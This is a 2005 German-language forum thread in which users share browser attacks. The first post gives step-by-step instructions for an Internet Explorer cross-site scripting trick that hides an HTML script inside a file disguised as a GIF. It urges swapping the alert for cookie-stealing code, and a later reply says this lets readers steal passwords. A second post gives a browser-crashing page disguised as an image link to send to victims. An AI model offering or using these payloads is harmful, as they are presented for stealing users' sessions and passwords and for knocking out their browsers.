IE < 6.0 Sicherheitslücke GIF Cross Site Scripting

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von Spy-King, 24. September 2005 .

Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies. Weitere Informationen
  1. #1 24. September 2005
    So Biete euch hier eine kleine aber feine Sicherheitslücke im IE < 6 an, mit der man mit ein wenig geschick tolle sachen machen kann.

    und zwar ist es möglich einen script auszuführen(der zum beispiel cookies speichert oder so) mit einer ganz normalen *.gif datei!

    [HIDE]
    1. eine datei erstellen und sie eurername.gif nenen
    2.mit einem editor bearbeiten (notepad)
    3.folgenden code einfügen:

    <GIF89aŸ8÷™fÿ™™>

    <html>
    <head>
    <script>
    alert("sicherheitslücke");
    </script>
    </head>
    <body>
    </body>
    </html>

    4.die bilddatei dann auf einen server schmeissen und direkt anwählen (http://www.eureurl.de/bild.gif)
    5.den alert befehl könnt ihr jetzt natürlich auch mit code ersetzen der cookies speichert oder sonstwas macht das ist euch überlassen will euch ja net alles in den mund legen ;-)
    6.viel spass und macht damit kein unsinn

    7. für alle nochmal zur erklärung der gif header <GIF89aŸ8÷™fÿ™™> wird vom ie erkannt weiter kümmert sich der ie net deswegen ist es möglich einen script auszuführen

    [/HIDE]

    es gibt bis jetzt für den meiner meinung nach scherwiegenden bug noch kein update!! 8)

    hoffe der wurde hier noch net angeboten viel spass damit

    ne bewertung wem es geholfen hat, oder wer seinen spass damit hatte wäre ganz nett

    nen kleines statement was ihr so gemacht habt und welchen script ihr genommen habt wäre auch ganz net damit das thema net unter geht ;-)

    mfg Spy
     

  2. Anzeige
  3. #2 24. September 2005
    ..werds nachher mal testen...

    habe hier auch ne ganz einfacher lücke um user von fast allen browsern lahmzulegen:

    [HIDE]

    1. Neue .html datei erstellen; am besten index.html nennen
    2. Diesen Code einfügen <img src="bild.jpg" width="99999999" height="99999999"> dabei aber beachten, dass das bild.jpg ein echtes bild sein muss (egal was für eins)
    3. Die index.html und das Bild in einen Ordner packen und auf nen server haun
    4. Wenn ihr den link noch am besten tarnen wollt, dann nennt den Ordner z.b babe.jpg/ ... so könnt ihr nacher so einen link verschicken: eureurl.de/babe.jpg , dabei könnte ihr dann den / weglassen, so denkt dann jeder es sein ein bild!
    5. Have fun^^

    [/HIDE]


    Vorschau^^ (Auf eigene Gefahr!!!): http://crunkym.cr.funpic.de/hot_babe.jpg
     
  4. #3 24. September 2005

    funzt bei firefox neme is alt
     
  5. #4 24. September 2005
    ausser man hat nicht die neue version vom firefox !
     
  6. #5 24. September 2005
    ich bin ziemlich eingerostet in php usw. wie wäre den der code zum speichern der cookies aufm server?
     
  7. #6 27. September 2005
    also bei mir funktioniert das nicht....
    zuerst hab ich ein .gif erstellt mit paint und den code reingeschrieben, nix passiert wenn mans mit firefox oder inetexplorer aufruft (lokal) und wenn ich ne textdatei mach und dann in .gif umwandle gehts auch ned.
     
  8. #7 27. September 2005
    habe es auch mal local ausprobier, funzt bei mir auch nicht.
     
  9. #8 27. September 2005
    also ihr erstellt eine textdatei und dann schreibt ihr den script rein (oben)
    dann speichert ihr das ganze ab und renamed die datei ind blabla.gif!
    dann haut ihr sie auf webspace und öffnet die ganze sache mit IE!
    dann sollte alles klappen und wenn ihr die richtigen scripts habt dann könnt ihr schön passwörter klauen!;-)
     

  10. Videos zum Thema
Die Seite wird geladen...